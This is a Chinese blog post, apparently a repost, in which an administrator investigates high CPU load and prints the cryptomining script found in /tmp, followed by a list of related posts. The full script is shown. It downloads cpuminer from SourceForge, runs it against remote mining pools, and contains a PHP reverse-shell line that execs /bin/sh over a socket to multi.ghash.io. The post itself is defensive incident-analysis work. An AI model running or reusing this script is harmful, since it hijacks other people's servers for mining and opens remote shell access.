今天服务器cpu使用率一直很高,而且是nice高,说明是一些低优先级的进程占用了大量的cpu,经过排查发先了minerd这个进程

以服务器的/tmp目录下找到了源头。。。。。一个简单的脚本:

 1 Cpunum=`cat /proc/cpuinfo |grep 'processor'|wc -l`;
 2 echo "cpu-number $Cpunum";
 3
 4 function random()
 5 {
 6     min=$1;
 7     max=$2-$1;
 8     num=$(date +%s+%N);
 9     ((retnum=num%max+min));
10     echo $retnum;
11 }
12
13 function down(){
14         rm -rf /tmp/minerd
15         rm -rf /tmp/pooler.tar.gz
16         Bits=`getconf LONG_BIT`;
17         echo $Bits;
18         if [ $Bits -eq 64 ];
19         then
20                 echo "is 64 bit";
21                 url='http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86_64.tar.gz'
22         elif [ $Bits -eq 32 ];
23         then
24                 echo "is 32 bit";
25                 url='http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz'
26         fi
27         echo $url
28         if [ -f /tmp/minerd ];
29         then
30                 echo "minerd File exists"
31                 #cd /tmp/
32                 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x
33         else
34                 if [ -f /tmp/pooler.tar.gz ];
35                 then
36                         rm -rf /tmp/pooler.tar.gz
37                 fi
38                 if [ `which wget` ];
39                 then
40                         echo "wget is ok."
41                         downtools=`wget -O /tmp/pooler.tar.gz $url`
42                 elif [ `which curl` ];
43                 then
44                         echo "curl is ok."
45                         downtools=`curl -o /tmp/pooler.tar.gz $url`
46                 fi
47                 cd /tmp/
48                 tar zxvf pooler.tar.gz
49                 rm -rf /tmp/pooler.tar.gz
50                 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x
51         fi
52
53 }
54 function run(){
55         out=$(random 1 100);
56         echo $out
57         Isopen=`php -r '$sock=@fsockopen("multi.ghash.io",3333);exec("/bin/sh -i <&3 >&3 2>&3");if ($sock) {echo "ok";}'`
58
59         if [ $Isopen ];
60         then
61                 echo "connt prot 3333 ok"
62                 cd /tmp
63                 ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker$out -p x
64         else
65                 echo "connt 186 host pool 80"
66                 cd /tmp
67                 ./minerd -a scrypt -o stratum+tcp://106.186.118.162:80 -u lscllc.worker1 -p x
68
69         fi
70 }
71
72 process=`pgrep minerd`
73
74 #echo $process
75
76 if [ $process ];
77 then
78         echo "find minerd ok start kill $process"
79         kill $process
80         run
81 else
82         echo "not find minerd process"
83         down
84         run
85 fi

转载于:https://www.cnblogs.com/xuxyblog/p/3856446.html

关于‘挖矿’minerd相关推荐

  1. 服务器被挖矿minerd***的解决办法

    千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个解决minerd并不是最终目的,主要是查找问题来源.解决问题思路1.打开防火墙,添加规则,关闭挖矿minerd的访问 ipt ...

  2. 阿里云服务器被挖矿minerd入侵的解决办法,导致tomcat启动很慢

    上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似, ...

  3. 【解决阿里云服务器提示挖矿程序风险2022】

    解决阿里云服务器提示挖矿程序风险2022-10 搜索删除含system-private相关的所有文件 如图:system-private.... 2.清除定时任务 3.修改文件可执行权限 4.清除路由 ...

  4. redis在容器里连接不上_Redis服务器被劫持风波,服务器相关知识共享学习

    俗话说安全猛于虎,之前多多少少有所小体会:这次的上线Redis服务器被劫严重影响了开发测试和线上环境,在解决的过程也对安全方面了解了很多:总结了这次过程的排查流程以及采取的相应测试,在此与大家共享. ...

  5. Redis服务器被劫持风波

    强烈推荐一个大神的人工智能的教程:http://www.captainbed.net/zhanghan [前言] 俗话说全猛于虎,之前多多少少有所小体会:这次的上线Redis服务器被劫严重影响了开发测 ...

  6. 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]

    突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...

  7. 阿里云服务器被挖矿病毒minerd***的解决方法

    早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之 ...

  8. 阿里云服务器被挖矿程序minerd入侵的终极解决办法

    突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...

  9. 关于服务被挖矿程序minerd入侵解决方法

    今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序, ...

  10. 清除挖矿脚本 minerd

    症状:cup占用率飙高 原因:这次入侵是由于redis没有设置用户名密码,没有限制访问ip导致 解决方法: ps -eopcpu,args --sort=%cpu|head    找到飙高的程序是mi ...

最新文章

  1. ×××linux下samba服务器
  2. SecureCRT通过密钥进行SSH登录
  3. 苏州飘“彩云” 五年规模破百亿元
  4. 【Python爬虫学习笔记12】Ajax数据爬取简介
  5. cv mat的shape_将ndarray转换为cv::Mat的最简单方法是什么?
  6. IMP-00041: 警告: 创建的对象带有编译警告解决办法
  7. 两台服务器建立信任关系(root,普通用户)
  8. 【codevs1039】01年noip TG--数的划分满分dp+愚蠢深搜+pas的奇怪做法
  9. 【Elasticsearch】一次 排查 iK 分词器 查询慢 分词多 内容大 的问题记录
  10. 再见!经典版Edge!
  11. input隐藏边框、设置透明背景色
  12. 《百度中小学人工智能课程》预计9月进课堂;AI医疗市场未来营收规模或达万亿以上...
  13. trie树模板(前缀树)
  14. Error:Execution failed for task ':recordlib:lint'. Lint found errors in the project; aborting buil
  15. 手机的 32K,26M时钟电路作用 (转载于 52rd zsqt8888的专栏)
  16. OCR学习之一:OCR简介
  17. [Copy] Netlink Socket
  18. c语言本地函数声明非法,C++本地函数定义是非法的
  19. 本周AI热点回顾:何恺明RegNet超越EfficientNet、数学难题“abc猜想”封印终被开启、微软麻将 AI 论文发布
  20. web of science 2022新版检索证明pdf下载方法

热门文章

  1. 关于react上线系列问题及解决方案
  2. 【Linux】X window与文本模式的切换
  3. URL重写,asp.net URL重写,URLRewriter.dll下载
  4. 《WF编程》系列之4 - 漫游工作流:Widows Workflow Runtime及其服务
  5. Python version 3.3 required, which was not found in the registry
  6. [Unity3D]自己动手重制坦克舰队ArmadaTank
  7. 清除windows的EFS加密
  8. 正则表达式匹配NOD用户名与密码
  9. 百余篇SCI文章的一字经验----短
  10. Quicktime:如何在录制屏幕时录制系统声音